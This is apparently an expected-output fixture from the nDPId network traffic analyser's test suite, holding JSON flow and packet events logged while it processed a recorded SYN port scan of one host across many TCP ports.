-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs7YEAADYGJPGsEAAIQA2GNIzSIyvdUoMYAAAAAGACDAAJZAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsph0AACwGdlWsEAAIQA2GNIzSDSfdUoMYAAAAAGACBAAnaAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsJeMAADAG8o+sEAAIQA2GNIzSCJTdUoMYAAAAAGACBAAr+wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsyUAAADAGTzKsEAAIQA2GNIzSCEndUoMYAAAAAGACBAAsRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAsBxkAACgGGVqsEAAIQA2GNIzSFtrdUoMYAAAAAGACBAAdtQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAs6FYAADkGJxysEAAIQA2GNIzSHVjdUoMYAAAAAGACCAATNwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAsEFQAADgGAB+sEAAIQA2GNIzSBEjdUoMYAAAAAGACBAAwRwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAso8IAACoGerCsEAAIQA2GNIzTJATdU4MZAAAAAGACDAAIiAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpQAADUG6N6sEAAIQA2GNIzTBJHdU4MZAAAAAGACCAAr+wAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsqggAADYGaGqsEAAIQA2GNIzTKUbdU4MZAAAAAGACDAADRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsvOQAACoGYY6sEAAIQA2GNIzTBuHdU4MZAAAAAGACDAAlqwAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsFNoAADYG\/ZisEAAIQA2GNIzTAAPdU4MZAAAAAGACDAAsiQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsbKEAAC8GrNGsEAAIQA2GNIzTBSrdU4MZAAAAAGACEAAjYgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsohQAACYGgF6sEAAIQA2GNIzTIAHdU4MZAAAAAGACDAAMiwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsrJgAADMGaNqsEAAIQA2GNIzTEdfdU4MZAAAAAGACEAAWtQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsOqsAADkG1MesEAAIQA2GNIzTTj\/dU4MZAAAAAGACCADiTAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsfAoAACkGo2isEAAIQA2GNIzTJxDdU4MZAAAAAGACCAAJfAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsAUAAADoGDTOsEAAIQA2GNIzTJMrdU4MZAAAAAGACDAAHwgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsEygAADoG+0qsEAAIQA2GNIzTBrfdU4MZAAAAAGACDAAl1QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsokMAADcGby+sEAAIQA2GNIzTCPDdU4MZAAAAAGACEAAfnAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsx6UAAC0GU82sEAAIQA2GNIzTFxLdU4MZAAAAAGACCAAZegAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsiMQAADcGiK6sEAAIQA2GNIzSG7zdUoMYAAAAAGACEAAM0wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsnfcAADsGb3usEAAIQA2GNIzSDwvdUoMYAAAAAGACEAAZhAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAspuwAAC8GcoasEAAIQA2GNIzSJ8TdUoMYAAAAAGACEAAAywAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
